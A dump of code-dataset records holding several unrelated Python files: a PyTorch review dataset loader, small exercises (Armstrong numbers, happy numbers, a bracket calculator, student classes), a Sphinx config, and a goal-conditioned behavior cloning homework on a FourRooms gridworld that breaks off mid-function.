pd.read_csv(review_csv)\n train_review_df = review_df[review_df.split=='train']\n return cls(review_df, ReviewVectorizer.from_dataframe(train_review_df))\n \n @classmethod\n def load_dataset_and_load_vectorizer(cls, review_csv, vectorizer_filepath):\n \"\"\"Load dataset and the corresponding vectorizer. 
\n Used in the case in the vectorizer has been cached for re-use\n \n Args:\n review_csv (str): location of the dataset\n vectorizer_filepath (str): location of the saved vectorizer\n Returns:\n an instance of ReviewDataset\n \"\"\"\n review_df = pd.read_csv(review_csv)\n vectorizer = cls.load_vectorizer_only(vectorizer_filepath)\n return cls(review_df, vectorizer)\n\n @staticmethod\n def load_vectorizer_only(vectorizer_filepath):\n \"\"\"a static method for loading the vectorizer from file\n \n Args:\n vectorizer_filepath (str): the location of the serialized vectorizer\n Returns:\n an instance of ReviewVectorizer\n \"\"\"\n with open(vectorizer_filepath) as fp:\n return ReviewVectorizer.from_serializable(json.load(fp))\n\n def save_vectorizer(self, vectorizer_filepath):\n \"\"\"saves the vectorizer to disk using json\n \n Args:\n vectorizer_filepath (str): the location to save the vectorizer\n \"\"\"\n with open(vectorizer_filepath, \"w\") as fp:\n json.dump(self._vectorizer.to_serializable(), fp)\n\n def get_vectorizer(self):\n \"\"\" returns the vectorizer \"\"\"\n return self._vectorizer\n\n def set_split(self, split=\"train\"):\n \"\"\" selects the splits in the dataset using a column in the dataframe \n \n Args:\n split (str): one of \"train\", \"val\", or \"test\"\n \"\"\"\n self._target_split = split\n self._target_df, self._target_size = self._lookup_dict[split]\n\n def __len__(self):\n return self._target_size\n\n def __getitem__(self, index):\n \"\"\"the primary entry point method for PyTorch datasets\n \n Args:\n index (int): the index to the data point \n Returns:\n a dictionary holding the data point's features (x_data) and label (y_target)\n \"\"\"\n row = self._target_df.iloc[index]\n\n review_vector = \\\n self._vectorizer.vectorize(row.review)\n\n rating_index = \\\n self._vectorizer.rating_vocab.lookup_token(row.rating)\n\n return {'x_data': review_vector,\n 'y_target': rating_index}\n\n def get_num_batches(self, batch_size):\n \"\"\"Given a batch size, return the number of batches in the dataset\n \n Args:\n batch_size (int)\n Returns:\n number of batches in the dataset\n \"\"\"\n return len(self) // batch_size \n \ndef generate_batches(dataset, batch_size, shuffle=True,\n drop_last=True, device=\"cpu\"):\n \"\"\"\n A generator function which wraps the PyTorch DataLoader. It will \n ensure each tensor is on the write device location.\n \"\"\"\n dataloader = DataLoader(dataset=dataset, batch_size=batch_size,\n shuffle=shuffle, drop_last=drop_last)\n\n for data_dict in dataloader:\n out_data_dict = {}\n for name, tensor in data_dict.items():\n out_data_dict[name] = data_dict[name].to(device)\n yield out_data_dict\n","repo_name":"dmgolembiowski/AI-news","sub_path":"learning/vectorization/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":5487,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"18"} +{"seq_id":"4658192740","text":"#wapp to check armstrong no \nn = int(input('Enter a no : '))\nn1 = n\nrev = 0\nwhile n>0:\n rem = n%10\n rev = rev+rem*rem*rem\n n = n//10\nif rev == n1:\n print('No. is armstrong')\nelse:\n print('No. 
is not armstrong')","repo_name":"siddesh1672003/python","sub_path":"rev1.py","file_name":"rev1.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22205597885","text":"# https://leetcode.com/discuss/interview-question/1061028/Indeed-or-Phone-Screen-(\n# Karat)-or-Parent-Child-Graph-and-Calculator Same aim as Q1 above, but this time the expression includes nested\n# expressions, e.g. \"12 + 2 + ((4 - 19) - 1)\" containing ( and ) brackets only. Evaluate and return the answer to\n# this expression. Input: \"12 - (1 - 2)\" Output: 13\n\ndef calculate(s):\n s = s.strip()\n if s[0] == \"-\":\n s = \"0\" + s\n operands = []\n operators = []\n temp_operands = []\n temp_operators = []\n temp = \"\"\n for index, char in enumerate(s):\n if char not in (\"(\", \")\", \"+\", \"-\", \" \"):\n temp += char\n elif char in (\"(\", \"+\", \"-\"):\n if char == \"-\" and s[index - 1] == \"(\":\n operands.append(0)\n if temp != \"\":\n operands.append(int(temp))\n temp = \"\"\n operators.append(char)\n elif char == \")\":\n if temp != \"\":\n operands.append(int(temp))\n temp = \"\"\n while operands and operators and operators[-1] != \"(\":\n temp_operands.append(operands.pop())\n temp_operators.append(operators.pop())\n operators.pop()\n temp_operands.append(operands.pop())\n result = evaluate_expression(temp_operands, temp_operators)\n operands.append(result)\n temp_operands = []\n temp_operators = []\n if temp != \"\":\n operands.append(int(temp))\n while operators:\n operand1 = operands.pop(0)\n operand2 = operands.pop(0)\n operator = operators.pop(0)\n result = evaluate(operand1, operand2, operator)\n operands.insert(0, result)\n return operands[0]\n\n\ndef evaluate_expression(operands, operators):\n while operators:\n operand1 = operands.pop()\n operand2 = operands.pop()\n operator = operators.pop()\n result = evaluate(operand1, operand2, operator)\n operands.append(result)\n return operands[0]\n\n\ndef evaluate(operand1, operand2, operator):\n if operator == \"+\":\n return operand1 + operand2\n else:\n return operand1 - operand2\n\n\nprint(calculate(\"12 + 2 + ((4 - 19) - 1)\"))\nprint(calculate(\"12 - (1 - 2)\"))\n\n\nexpression2_1 = \"5+16-((9-6)-(4-2))+1\"\nexpression2_2 = \"22+(2-4)\"\nexpression2_3 = \"6+9-12\"\nexpression2_4 = \"((1024))\"\nexpression2_5 = \"1+(2+3)-(4-5)+6\"\nexpression2_6 = \"255\"\n\n\nprint(calculate(expression2_1))\nprint(calculate(expression2_2))\nprint(calculate(expression2_3))\nprint(calculate(expression2_4))\nprint(calculate(expression2_5))\nprint(calculate(expression2_6))\n","repo_name":"dheerajthodupunoori/problem-solving","sub_path":"indeed-karat/basic_calculator.py","file_name":"basic_calculator.py","file_ext":"py","file_size_in_byte":2627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"42624088613","text":"# Configuration file for the Sphinx documentation builder.\n#\n# This file only contains a selection of the most common options. For a full\n# list see the documentation:\n# http://www.sphinx-doc.org/en/master/config\n\n# The docs templates, css and js all comes from discord.py (https://github.com/Rapptz/discord.py)\n# Thanks to Rapptz (Danny) for this amazing theme and scripts.\n\n# -- Path setup --------------------------------------------------------------\n\n# If extensions (or modules to document with autodoc) are in another directory,\n# add these directories to sys.path here. 
If the directory is relative to the\n# documentation root, use os.path.abspath to make it absolute, like shown here.\n#\nimport os\n\nimport shinkei\n\n# import sys\n# sys.path.insert(0, os.path.abspath(\".\"))\n\n\n# -- Project information -----------------------------------------------------\n\nproject = \"shinkei\"\n# noinspection PyShadowingBuiltins\ncopyright = \"2019, Lorenzo\"\nauthor = \"Lorenzo\"\n\n# The short X.Y version\nversion = shinkei.__version__\n# The full version, including alpha/beta/rc tags\nrelease = version\n\n# -- General configuration ---------------------------------------------------\n\n# Add any Sphinx extension module names here, as strings. They can be\n# extensions coming with Sphinx (named \"sphinx.ext.*\") or your custom\n# ones.\nextensions = [\n \"sphinx.ext.autodoc\",\n \"sphinx.ext.coverage\",\n \"sphinx.ext.napoleon\",\n \"sphinx.ext.intersphinx\",\n \"sphinxcontrib_trio\",\n]\n\n# Add any paths that contain templates here, relative to this directory.\ntemplates_path = [\"_templates\"]\n\n# The suffix(es) of source filenames.\n# You can specify multiple suffix as a list of string:\n#\n# source_suffix = [\".rst\", \".md\"]\nsource_suffix = \".rst\"\n\n# The master toctree document.\nmaster_doc = \"index\"\n\n# The language for content autogenerated by Sphinx. Refer to documentation\n# for a list of supported languages.\n#\n# This is also used if you do content translation via gettext catalogs.\n# Usually you set \"language\" from the command line for these cases.\nlanguage = None\n\n# List of patterns, relative to source directory, that match files and\n# directories to ignore when looking for source files.\n# This pattern also affects html_static_path and html_extra_path.\nexclude_patterns = [\"_build\", \"Thumbs.db\", \".DS_Store\"]\n\n# The name of the Pygments (syntax highlighting) style to use.\npygments_style = \"friendly\"\n\n# -- Options for HTML output -------------------------------------------------\n\n# The theme to use for HTML and HTML Help pages. See the documentation for\n# a list of builtin themes.\n#\nhtml_experimental_html5_writer = True\nhtml_theme = \"basic\"\n\n# Add any paths that contain custom static files (such as style sheets) here,\n# relative to this directory. 
They are copied after the builtin static files,\n# so a file named \"default.css\" will overwrite the builtin \"default.css\".\nhtml_static_path = [\"_static\"]\n\n# better scorer\nhtml_search_scorer = \"_static/scorer.js\"\n\n# Output file base name for HTML help builder.\nhtmlhelp_basename = \"shinkeidoc\"\n\nhtml_context = {\n 'ON_READTHEDOCS': bool(os.environ.get('READTHEDOCS'))\n}\n\n# -- Extension configuration -------------------------------------------------\n\n# -- Options for intersphinx extension ---------------------------------------\n\nintersphinx_mapping = {\n \"python\": (\"https://docs.python.org/3\", None),\n \"aiohttp\": (\"https://aiohttp.readthedocs.io/en/stable/\", None),\n \"discord.py\": (\"https://discordpy.readthedocs.io/en/latest/\", None)\n}\n\nautodoc_member_order = \"bysource\"\n\n\ndef setup(app):\n app.add_javascript(\"custom.js\")\n","repo_name":"PendragonLore/shinkei","sub_path":"docs/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":3583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"49329497","text":"\n# create a class Persona with atributes nombre, apellido, dni\nclass Persona:\n\n def __init__(self, nombre, apellido, dni):\n self.nombre = nombre\n self.apellido = apellido\n self.dni = dni\n\n def __str__(self):\n return self.nombre + \" \" + self.apellido + \" \" + self.dni\n\n# create a class Alumno that inherits from Persona with atriutes nombre, apellido, dni, matricula, email, curso, promedio\nclass Alumno(Persona):\n\n def __init__(self, nombre, apellido, dni, matricula, email, curso, promedio):\n super().__init__(nombre, apellido, dni)\n self.matricula = matricula\n self.email = email\n self.curso = curso\n self.promedio = promedio\n\n def __str__(self):\n return super().__str__() + \" \" + self.matricula + \" \" + self.email + \" \" + self.curso + \" \" + self.promedio\n\nclass Lista:\n\n alumnos: list[object] = []\n\n @staticmethod\n def agregar_alumno(alumno: object):\n Lista.alumnos.append(alumno)\n\n # return the best promedio of one course\n @staticmethod\n def mejor_promedio(curso: str):\n promedio_max = 0\n for alumno in Lista.alumnos:\n if alumno.curso == curso:\n if alumno.promedio > promedio_max:\n promedio_max = alumno.promedio\n return promedio_max\n\n\n\ndef main():\n # create a list of Alumno objects\n alumno1 = Alumno(\"Juan\", \"Perez\", \"12345678\", \"1234\", \"alumno1@gmail.com\", \"1A\", 8.5)\n alumno2 = Alumno(\"Maria\", \"Gomez\", \"87654321\", \"5678\", \"alumno2@gmail.com\", \"2B\", 7.5)\n alumno3 = Alumno(\"Pedro\", \"Lopez\", \"13579246\", \"9101\", \"alumno3@gmail.com\", \"3C\", 9.0)\n alumno4 = Alumno(\"Ana\", \"Martinez\", \"24681013\", \"1112\", \"alumno4@gmail.com\", \"1A\", 8.0)\n alumno5 = Alumno(\"Jose\", \"Gonzalez\", \"31415926\", \"1314\", \"alumno5@gmail.com\", \"1A\", 7.0)\n\n # add the Alumno objects to the list\n Lista.agregar_alumno(alumno1)\n Lista.agregar_alumno(alumno2)\n Lista.agregar_alumno(alumno3)\n Lista.agregar_alumno(alumno4)\n Lista.agregar_alumno(alumno5)\n\n print(Lista.mejor_promedio(\"1A\"))\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"Lucas16AR/UM-Diseno-De-Sistemas-2022","sub_path":"Parcial/Recuperatorio/Recuperatorio Lucas Galdame Villegas/ejercicio1.2.py","file_name":"ejercicio1.2.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"37981428449","text":"class Solution(object):\n def 
isHappy(self, n):\n \"\"\"\n :type n: int\n :rtype: bool\n \"\"\"\n # squaresum = False\n st=set()\n while(n !=1):\n n = self.square_number(n)\n if n in st:\n return False\n st.add(n) \n if n == 1:\n return True\n \n\n def square_number(self,num):\n squaresum = 0\n while(num):\n squaresum += pow(num%10,2)\n num = (num//10)\n \n return squaresum\n\n \n# Input: n = 19\n# Output: true\n# Explanation:\n# 12 + 92 = 82\n# 82 + 22 = 68\n# 62 + 82 = 100\n# 12 + 02 + 02 = 1\n\"\"\"\nA happy number is a number defined by the following process:\nStarting with any positive integer, replace the number by the sum of the squares of its digits.\nRepeat the process until the number equals 1 (where it will stay), or it loops endlessly in a cycle which does not include 1.\nThose numbers for which this process ends in 1 are happy.\n\n slow = self.square_number(n)\n fast = self.square_number(self.square_number(n))\n\n while slow!=fast and fast!=1:\n # print(slow,fast)\n slow = self.square_number(slow)\n fast = self.square_number(self.square_number(fast))\n \n return fast==1\n\"\"\"\n","repo_name":"aviTak/dsa-interview-prep","sub_path":"LeetCode 75/Python LeetCode 75/202Happy Number.py","file_name":"202Happy Number.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"45509059884","text":"from collections import OrderedDict, deque\nfrom typing import Tuple \nimport gym\nfrom gym import spaces\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random\nfrom queue import Queue\n\nimport torch\nfrom torch.utils.data import Dataset, DataLoader\nimport torch.nn.functional as F\nfrom tqdm import tqdm\n# Import make_model here from the approptiate model_*.py file\nfrom model_pytorch import make_model\n# This model should be the same as problem 2\n\nclass GCDataset(torch.utils.data.Dataset):\n\tdef __init__(self, train_states, train_actions) -> None:\n\t\tsuper().__init__()\n\t\tself.train_states = train_states\n\t\tself.train_actions = train_actions\n\n\tdef __len__(self):\n\t\treturn len(self.train_states)\n\t\n\tdef __getitem__(self, idx):\n\n\t\tinput = torch.tensor(self.train_states[idx]).float()\n\t\tout = torch.tensor(self.train_actions[idx]).long()\n\t\treturn {\n\t\t\t'input': input,\n\t\t\t'output': out\n\t\t}\n\n\n### 2.1 Build Goal-Conditioned Task\nclass FourRooms:\n\tdef __init__(self, l=5, T=30):\n\t\t'''\n\t\tFourRooms Environment for pedagogic purposes\n\t\tEach room is a l*l square gridworld, \n\t\tconnected by four narrow corridors,\n\t\tthe center is at (l+1, l+1).\n\t\tThere are two kinds of walls:\n\t\t- borders: x = 0 and 2*l+2 and y = 0 and 2*l+2 \n\t\t- central walls\n\t\tT: maximum horizion of one episode\n\t\t\tshould be larger than O(4*l)\n\t\t'''\n\t\tassert l % 2 == 1 and l >= 5\n\t\tself.l = l\n\t\tself.total_l = 2 * l + 3\n\t\tself.T = T\n\n\t\t# create a map: zeros (walls) and ones (valid grids)\n\t\tself.map = np.ones((self.total_l, self.total_l), dtype=np.bool)\n\t\t# build walls\n\t\tself.map[0, :] = self.map[-1, :] = self.map[:, 0] = self.map[:, -1] = False\n\t\tself.map[l+1, [1,2,-3,-2]] = self.map[[1,2,-3,-2], l+1] = False\n\t\tself.map[l+1, l+1] = False\n\n\t\t# define action mapping (go right/up/left/down, counter-clockwise)\n\t\t# e.g [1, 0] means + 1 in x coordinate, no change in y coordinate hence\n\t\t# hence resulting in moving right\n\t\tself.act_set = np.array([\n\t\t\t[1, 0], [0, 1], [-1, 0], [0, -1] \n\t\t], dtype=np.int)\n\t\tself.action_space = 
spaces.Discrete(4)\n\n\t\t# you may use self.act_map in search algorithm \n\t\tself.act_map = {}\n\t\tself.act_map[(1, 0)] = 0\n\t\tself.act_map[(0, 1)] = 1\n\t\tself.act_map[(-1, 0)] = 2\n\t\tself.act_map[(0, -1)] = 3\n\n\tdef render_map(self):\n\t\tplt.imshow(self.map)\n\t\tplt.xlabel('y')\n\t\tplt.ylabel('x')\n\t\tplt.savefig('p2_map.png', \n\t\t\t\t\tbbox_inches='tight', pad_inches=0.1, dpi=300)\n\t\tplt.show()\n\t\n\tdef sample_sg(self) -> Tuple[np.array, np.array]:\n\t\t# sample s\n\t\twhile True:\n\t\t\ts = [np.random.randint(self.total_l), \n\t\t\t\tnp.random.randint(self.total_l)]\n\t\t\tif self.map[s[0], s[1]]:\n\t\t\t\tbreak\n\n\t\t# sample g\n\t\twhile True:\n\t\t\tg = [np.random.randint(self.total_l), \n\t\t\t\tnp.random.randint(self.total_l)]\n\t\t\tif self.map[g[0], g[1]] and \\\n\t\t\t\t(s[0] != g[0] or s[1] != g[1]):\n\t\t\t\tbreak\n\t\treturn s, g\n\n\tdef reset(self, s=None, g=None):\n\t\t'''\n\t\tArgs:\n\t\t\ts: starting position, np.array((2,))\n\t\t\tg: goal, np.array((2,))\n\t\tReturn:\n\t\t\tobs: np.cat(s, g)\n\t\t'''\n\t\tif s is None or g is None:\n\t\t\ts, g = self.sample_sg()\n\t\telse:\n\t\t\tassert 0 < s[0] < self.total_l - 1 and 0 < s[1] < self.total_l - 1\n\t\t\tassert 0 < g[0] < self.total_l - 1 and 0 < g[1] < self.total_l - 1\n\t\t\tassert (s[0] != g[0] or s[1] != g[1])\n\t\t\tassert self.map[s[0], s[1]] and self.map[g[0], g[1]]\n\t\t\n\t\tself.s = s\n\t\tself.g = g\n\t\tself.t = 1\n\n\t\treturn self._obs()\n\t\n\tdef step(self, a):\n\t\t'''\n\t\tArgs:\n\t\t\ta: action, index into act_set\n\t\tReturn obs, reward, done, info:\n\t\t\tdone: whether the state has reached the goal\n\t\t\tinfo: succ if the state has reached the goal, fail otherwise \n\t\t'''\n\t\tassert self.action_space.contains(a)\n\n\t\t# WRITE CODE HERE\n\t\treached_goal = np.allclose(self.s, self.g)\n\t\talready_done = reached_goal or self.t >= self.T\n\t\tif already_done:\n\t\t\tprint(\"[warning] already done, cannot step\")\n\t\t\treturn self._obs(), 1 if reached_goal else 0, True, reached_goal\n\n\t\tif self.map[self.s[0], self.s[1]] == 0:\n\t\t\t# \"step into a wall?!\"\n\t\t\t# self.s = self.s\n\t\t\tpass\n\t\telse:\n\t\t\tself.s = self.s + self.act_set[a]\n\t\treward = 0.0 if reached_goal else 1\n\t\treached_goal = np.allclose(self.s, self.g)\n\t\tdone = False\n\t\tself.t += 1\n\t\tdone = reached_goal or self.t >= self.T\n\t\t# END\n\t\t\n\t\treturn self._obs(), reward, done, reached_goal\n\n\tdef _obs(self):\n\t\treturn np.concatenate([self.s, self.g])\n\n\ndef plot_traj(env, ax, traj, goal=None):\n\ttraj_map = env.map.copy().astype(np.float)\n\ttraj_map[traj[:, 0], traj[:, 1]] = 2 # visited states\n\ttraj_map[traj[0, 0], traj[0, 1]] = 1.5 # starting state\n\ttraj_map[traj[-1, 0], traj[-1, 1]] = 2.5 # ending state\n\tif goal is not None:\n\t\ttraj_map[goal[0], goal[1]] = 3 # goal\n\tax.imshow(traj_map)\n\tax.set_xlabel('y')\n\tax.set_label('x')\n\n### A uniformly random policy's trajectory\ndef test_step(env: FourRooms):\n\ts_g = np.array([1, 1])\n\tg = np.array([2*l+1, 2*l+1])\n\ts_g = env.reset(s_g, g)\n\tdone = False\n\ttraj = [s_g]\n\twhile not done:\n\t\ts_g, _, done, _ = env.step(env.action_space.sample())\n\t\ttraj.append(s_g)\n\ttraj = np.array(traj)\n\n\tax = plt.subplot()\n\tplot_traj(env, ax, traj, g)\n\tplt.savefig('p2_random_traj.png', \n\t\t\tbbox_inches='tight', pad_inches=0.1, dpi=300)\n\tplt.show()\n\n\ndef compute_shortest_path(env: FourRooms, start=None, goal=None):\n\tshortest_traj = None\n\tshortest_action = None\n\tvisited = np.zeros(env.map.shape, 
dtype=bool)\n\tif start is None or goal is None:\n\t\tstart, goal = env.s, env.g\n\t_map = env.map\n\t_act_set = env.act_set\n\t# act_map = env.act_map\n\n\tdone = False\n\tbfs_queue = deque()\n\tbfs_queue.append(([start], []))\n\twhile len(bfs_queue) > 0:\n\t\tstates, actions = bfs_queue.popleft()\n\t\tcur_s = states[-1]\n\t\tif np.allclose(cur_s, goal):\n\t\t\tdone = True\n\t\t\tshortest_traj = states\n\t\t\tshortest_action = actions\n\t\t\tbreak\n\t\tfor a in range(4):\n\t\t\ts_next = cur_s + _act_set[a]\n\t\t\tif _map[s_next[0], s_next[1]] and not visited[s_next[0], s_next[1]]:\n\t\t\t\tbfs_queue.append((states + [s_next], actions + [a]))\n\t\t\t\tvisited[s_next[0], s_next[1]] = True\n\t# in four rooms, there is always a path; if not, check env.T setting.\n\tassert done, \"goal not reached\"\n\treturn np.array(shortest_traj, dtype=int), np.array(shortest_action, dtype=int)\n\ndef shortest_path_expert(env: FourRooms, render=False):\n\t\"\"\" \n\tImplement a shortest path algorithm and collect N trajectories for N goal reaching tasks\n\t\"\"\"\n\tN = 1000\n\texpert_trajs = []\n\texpert_actions = []\n\n\t# WRITE CODE HERE\n\tfor i in range(N):\n\t\tenv.reset()\n\t\ttraj, actions = compute_shortest_path(env)\n\t\texpert_trajs.append(traj)\n\t\texpert_actions.append(actions)\n\t# END\n\t# You should obtain expert_trajs, expert_actions from search algorithm\n\n\tfig, axes = plt.subplots(5,5, figsize=(10,10))\n\taxes = axes.reshape(-1)\n\tfor idx, ax in enumerate(axes):\n\t\tplot_traj(env, ax, expert_trajs[idx])\n\t\n\t# Plot a subset of expert state trajectories\n\tplt.savefig('p2_expert_trajs.png', \n\t\t\tbbox_inches='tight', pad_inches=0.1, dpi=300)\n\tif render:\n\t\tplt.show()\n\treturn expert_trajs, expert_actions\n\n\nclass GCBC:\n\n\tdef __init__(self, env, expert_trajs, expert_actions, expert_original_goals=None, num_workers=1):\n\t\tself.env = env\n\t\tself.expert_trajs = expert_trajs\n\t\tself.expert_actions = expert_actions\n\t\tself.expert_original_goals = expert_original_goals\n\n\t\tself.transition_num = sum(map(len, expert_actions))\n\t\tself.model = make_model(input_dim=4, output_dim=4)\n\t\t# state_dim + goal_dim = 4\n\t\t# action_choices = 4\n\t\tself.model_optimizer = torch.optim.Adam(self.model.parameters(), lr=1e-3)\n\t\tself.num_workers = num_workers\n\t\n\tdef generate_behavior_cloning_data(self):\n\t\t# training state should be a concatenation of state and goal\n\t\tself._train_states = []\n\t\tself._train_actions = []\n\t\t\n\t\t# WRITE CODE HERE\n\t\tfor traj, actions in zip(self.expert_trajs, self.expert_actions):\n\t\t\tfor idx in range(len(actions)):\n\t\t\t\tself._train_states.append(np.concatenate([traj[idx], traj[-1]]))\n\t\t\t\tself._train_actions.append(actions[idx])\n\t\t# END\n\n\t\tself._train_states = np.array(self._train_states).astype(np.float) # size: (*, 4)\n\t\tself._train_actions = np.array(self._train_actions) # size: (*, )\n\t\t\n\tdef generate_relabel_data(self, relabel_one_future=True):\n\t\t# apply expert data goal relabelling trick\n\t\tself._train_states = []\n\t\tself._train_actions = []\n\n\t\t# WRITE CODE HERE\n\t\tfor traj, actions in zip(self.expert_trajs, self.expert_actions):\n\t\t\tfor idx in range(len(actions)):\n\t\t\t\tif relabel_one_future:\n\t\t\t\t\tchosen_idx = np.random.choice(np.arange(idx + 1, len(traj)))\n\t\t\t\t\trelabeled_goal = traj[chosen_idx]\n\t\t\t\t\tself._train_states.append(np.concatenate([traj[idx], relabeled_goal]))\n\t\t\t\t\tself._train_actions.append(actions[idx])\n\t\t\t\telse: \n\t\t\t\t\tfor 
relabeled_goal in traj[idx+1:]:\n\t\t\t\t\t\tself._train_states.append(np.concatenate([traj[idx], relabeled_goal]))\n\t\t\t\t\t\tself._train_actions.append(actions[idx])\n\t\t# END\n\n\t\tself._train_states = np.array(self._train_states).astype(np.float) # size: (*, 4)\n\t\tself._train_actions = np.array(self._train_actions) # size: (*, 4)\n\n\t# def train_epoch(self):\n\t# \tout = self.model(self._train_states)\n\n\tdef generate_random_policy_vanilla_data(self):\n\t\tself._train_states = []\n\t\tself._train_actions = []\n\t\t\n\t\t# WRITE CODE HERE\n\t\tfor traj, actions, goals in zip(self.expert_trajs, self.expert_actions, self.expert_original_goals):\n\t\t\tfor idx in range(len(actions)):\n\t\t\t\tgoal = goals[idx]\n\t\t\t\tself._train_states.append(np.concatenate([traj[idx], goal]))\n\t\t\t\tself._train_actions.append(actions[idx])\n\t\t# END\n\t\tself._train_states = np.array(self._train_states).astype(np.float) # size: (*, 4)\n\t\tself._train_actions = np.array(self._train_actions) # size: (*, )\n\t\t\n\tdef generate_random_policy_relabel_data(self, relabel_one_future=True):\n\t\tself._train_states = []\n\t\tself._train_actions = []\n\t\t\n\t\t# WRITE CODE HERE\n\t\tfor traj, actions, goals in zip(self.expert_trajs, self.expert_actions, self.expert_original_goals):\n\t\t\tfor idx in range(len(actions)):\n\t\t\t\tif not relabel_one_future:\n\t\t\t\t\t# state not reached case, add \"far away\" goal intentionally\n\t\t\t\t\tif not np.allclose(traj[-1], goals[idx]):\n\t\t\t\t\t\tgoal = goals[idx]\n\t\t\t\t\t\tself._train_states.append(np.concatenate([traj[idx], goal]))\n\t\t\t\t\t\tself._train_actions.append(actions[idx])\n\t\t\t\t\t\n\t\t\t\t\tfor relabeled_goal in traj[idx+1:]:\n\t\t\t\t\t\tself._train_states.append(np.concatenate([traj[idx], relabeled_goal]))\n\t\t\t\t\t\tself._train_actions.append(actions[idx])\n\t\t\t\telse:\n\t\t\t\t\tchosen_idx = np.random.choice(np.arange(idx + 1, len(traj)))\n\t\t\t\t\trelabeled_goal = traj[chosen_idx]\n\t\t\t\t\tself._train_states.append(np.concatenate([traj[idx], relabeled_goal]))\n\t\t\t\t\tself._train_actions.append(actions[idx])\n\n\t\t# END\n\t\tself._train_states = np.array(self._train_states).astype(np.float) # size: (*, 4)\n\t\tself._train_actions = np.array(self._train_actions) # size: (*, )\n\t\t\n\n\tdef train(self, dataloader, num_epochs=20, batch_size=256):\n\t\t\"\"\" \n\t\tTrains the model on training data generated by the expert policy.\n\t\tArgs:\n\t\t\tnum_epochs: number of epochs to train on the data generated by the expert.\n\t\t\tbatch_size\n\t\tReturn:\n\t\t\tloss: (float) final loss of the trained policy.\n\t\t\tacc: (float) final accuracy of the trained policy\n\t\t\"\"\"\n\t\t# WRITE CODE HERE\n\t\t# END\n\t\tfor epoch in range(num_epochs):\n\t\t\tepoch_loss = 0\n\t\t\tepoch_acc = 0\n\t\t\tself.model_optimizer.zero_grad()\n\t\t\t# TODO The reason I used dataloader is that I am comfortable with it and it supports useful features including multiprocess for preparing large batches of data while GPUs are busy with training. Somehow it becomes a bottleneck in our hw3. Anyway the problem is solved and I will just use a forloop. Please let me know if you have any clue regarding why this dataloader related issue happens. For now I guess it is due to slicing vs. 
loop get difference from memory.\n\t\t\t# for i, data in enumerate(dataloader):\n\t\t\tfor i in range(0, len(self._train_actions), batch_size):\n\t\t\t\t# states, actions = data[\"input\"], data[\"output\"]\n\t\t\t\tstates = torch.tensor(self._train_states[i:i+batch_size]).float()\n\t\t\t\tactions = torch.tensor(self._train_actions[i:i+batch_size]).long()\n\t\t\t\tout = self.model(states)\n\t\t\t\tloss = F.cross_entropy(out, actions)\n\t\t\t\tacc = (out.argmax(dim=1) == actions).float().mean()\n\t\t\t\tloss.backward()\n\t\t\t\tself.model_optimizer.step()\n\t\t\t\tself.model_optimizer.zero_grad()\n\n\t\t\t\tepoch_loss += loss.item()\n\t\t\t\tepoch_acc += acc.item()\n\t\t\t# print(f\"Epoch {epoch}: loss {epoch_loss / len(dataloader)}, acc {epoch_acc / len(dataloader)}\")\n\n\t\tepoch_loss = epoch_loss / len(dataloader)\n\t\tepoch_acc = epoch_acc / len(dataloader)\n\t\treturn epoch_loss, epoch_acc\n\n\tdef gen_dataset(self):\n\t\treturn GCDataset(self._train_states, self._train_actions)\n\ndef gcbc_policy(gcbc: GCBC):\n\tdef _policy(state_goal_vec):\n\t\tinput = torch.tensor(state_goal_vec).float()\n\t\tout = gcbc.model(input)\n\t\taction = out.argmax(dim=0)\n\t\treturn action.item()\n\treturn _policy\n\ndef evaluate_gc(env, policy, n_episodes=50):\n\tsuccs = 0\n\tfor _ in range(n_episodes):\n\t\tgoal_reached = generate_gc_episode(env, policy)\n\t\tif goal_reached:\n\t\t\tsuccs += 1\n\t\t# WRITE CODE HERE\n\t\t# END\n\tsuccs /= n_episodes\n\treturn succs\n\n\ndef generate_gc_episode(env, policy):\n\t\"\"\"Collects one rollout from the policy in an environment. The environment\n\tshould implement the OpenAI Gym interface. A rollout ends when done=True. The\n\tnumber of states and actions should be the same, so you should not include\n\tthe final state when done=True.\n\tArgs:\n\t\tenv: an OpenAI Gym environment.\n\t\tpolicy: a trained model\n\tReturns:\n\t\"\"\"\n\tdone = False\n\ts_g = env.reset()\n\n\twhile not done:\n\t\taction = policy(s_g)\n\t\ts_g, reward, done, goal_reached = env.step(action)\n\t\t# WRITE CODE HERE\n\t\t# END\n\treturn goal_reached\n\ndef generate_random_trajs(env, N=1000):\n\trandom_trajs = []\n\trandom_actions = []\n\trandom_goals = []\n\n\t# WRITE CODE HERE\n\tfor _ in range(N):\n\t\tactions = []\n\t\tgoals = []\n\t\tdone = False\n\t\ts_g = env.reset()\n\t\ttraj = [s_g[:2]]\n\t\twhile not done:\n\t\t\taction = env.action_space.sample()\n\t\t\ts_g, reward, done, goal_reached = env.step(action)\n\t\t\ttraj.append(s_g[:2])\n\t\t\tgoals.append(s_g[2:])\n\t\t\tactions.append(action)\n\t\trandom_trajs.append(traj)\n\t\trandom_actions.append(actions)\n\t\trandom_goals.append(goals)\n\t# END\n\t# You should obtain random_trajs, random_actions, random_goals from random policy\n\n\t# train GCBC based on the previous code\n\t# WRITE CODE HERE\n\treturn random_trajs, random_actions, random_goals\n\ndef run_GCBC(env, mode='relabel', num_seeds=5, num_iters=150, num_epochs=2, batch_size=256, num_workers=1, relabel_one_future=True):\n\t# mode = 'vanilla'\n\tloss_vecs = []\n\tacc_vecs = []\n\tsucc_vecs = []\n\n\tfor i in range(num_seeds):\n\t\tprint('*' * 50)\n\t\tprint('seed: %d' % i)\n\t\tloss_vec = []\n\t\tacc_vec = []\n\t\tsucc_vec = []\n\t\t# generate new set of 